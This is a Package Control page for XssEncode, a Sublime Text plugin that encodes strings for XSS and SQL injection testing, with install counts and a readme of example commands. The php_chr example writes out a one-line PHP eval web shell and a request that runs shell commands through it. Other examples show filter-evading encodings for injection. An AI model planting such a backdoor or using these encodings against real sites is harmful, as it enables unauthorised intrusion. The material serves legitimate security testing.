ctrl+shift+p filters: :st2 :st3 :win :osx :linux
Browse

Xss​Encode

by Medicean ST2/ST3

Converts characters from one encoding to another using a transformation.

Details

Installs

  • Total 477
  • Win 294
  • OS X 124
  • Linux 59
May 26 May 25 May 24 May 23 May 22 May 21 May 20 May 19 May 18 May 17 May 16 May 15 May 14 May 13 May 12 May 11 May 10 May 9 May 8 May 7 May 6 May 5 May 4 May 3 May 2 May 1 Apr 30 Apr 29 Apr 28 Apr 27 Apr 26 Apr 25 Apr 24 Apr 23 Apr 22 Apr 21 Apr 20 Apr 19 Apr 18 Apr 17 Apr 16 Apr 15 Apr 14 Apr 13 Apr 12 Apr 11
Windows 1 1 3 3 1 0 1 7 0 1 2 0 0 0 0 2 4 1 0 0 2 0 1 2 0 0 1 0 0 1 0 3 0 0 2 1 1 4 0 0 2 0 2 1 8 1
OS X 1 0 1 1 1 1 1 2 0 0 1 3 0 0 0 2 0 0 0 0 0 0 0 0 1 0 0 0 1 0 2 0 1 0 2 0 2 0 0 1 0 0 1 0 2 0
Linux 1 0 2 0 0 0 0 0 0 0 1 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 0 2 0 0 0 0 0 0 0 0 0 1

Readme

Source
raw.​githubusercontent.​com

Sublime XssEncode

English | 中文说明

Converts characters from one encoding to another using a transformation. This tool will help you encode payloads in testing sql injections, XSS holes and site security.

Convert the region you selected or convert all characters.

XssEncode supports both Sublime Text 2 and 3.

Installation

Using Package Control to find, install and upgrade XssEncode is the recommended method to install this plug-in.

Otherwise, you can use the following steps manually install:

  1. Open the Sublime Text Packages folder

    • OS X: ~/Library/Application Support/Sublime Text 3/Packages/
    • Windows: %APPDATA%/Sublime Text 3/Packages/
    • Linux: ~/.Sublime Text 3/Packages/ or ~/.config/sublime-text-3/Packages
  2. clone this repo

    git clone https://github.com/Medicean/SublimeXssEncode.git
    
  3. Rename the new folder to xssencode

ChangeLog

See more at ChangeLog

Example Commands

You can type the Command HotKeys(Win: ctrl+shift+p, OSX: Command+shift+p),type xssencode and choice your action。Otherwise, click the menu bar tools => XssEncode and choice your action.

  • html_escape

    Converts characters to their HTML entity.

    eg:

    a1@& => a1@&

  • html10_encode

    Converts characters to html entity with decimal.

    eg:

    a1@& => a1@&

  • html16_encode

    Converts characters to html entity with hexadecimal.

    eg:

    a1@& => a1@&

  • html_unescape

    Converts html entity to characters.

    eg:

    aaa& => aaa&

  • base64_encode

    Uses base64 to encode into base64

    eg:

    a1@& => YTFAJg==

  • base64_decode

    eg:

    YTFAJg== => a1@&

  • url_encode

    eg:

    alert(/xss/); => alert%28/xss/%29%3B

  • url_decode

    eg:

    alert%28/xss/%29%3B => alert(/xss/);

  • string_from_char_code

    eg:

    alert(/xss/); => String.fromCharCode(97,108,101,114,116,40,47,120,115,115,47,41,59)

  • mysql_char

    eg:

    123 => CHAR(49,50,51)

    You can excute the sql commands below.

    select 123;

    select CHAR(49,50,51);

  • oracle_chr

    eg:

    123 => CHR(49)||CHR(50)||CHR(51)

    You can excute the sql commands below.

    select 123;

    select CHR(49)||CHR(50)||CHR(51);

  • php_chr

    Convert characters with function chr.

    eg:

    Support we have a php backdoor, and the content is <?php @eval($_REQUEST[cmd]);?>

    if you want to execute some commands which includes special chars, you can convert it.

    ls -al => CHR(108).CHR(115).CHR(32).CHR(45).CHR(97).CHR(108)

    now you can request the url below:

    http://127.0.0.1/backdoor.php?cmd=system(CHR(108).CHR(115).CHR(32).CHR(45).CHR(97).CHR(108));

  • string_to_hex

    Convert string to hexadecimal, it's more useful for sql injection.

    eg:

    root => 726f6f74

    now you can excute the sql commands below.

    SELECT user from mysql.user where user='root';

    SELECT user from mysql.user where user=0x726f6f74;

  • hex_to_string

    eg:

    726f6f74 => root

  • unicode_decode

    eg:

    测试 => \u6d4b\u8bd5

  • unicode_encode

    eg:

    \u6d4b\u8bd5 => 测试

  • md5_encode

    eg:

    1 => c4ca4238a0b923820dcc509a6f75849b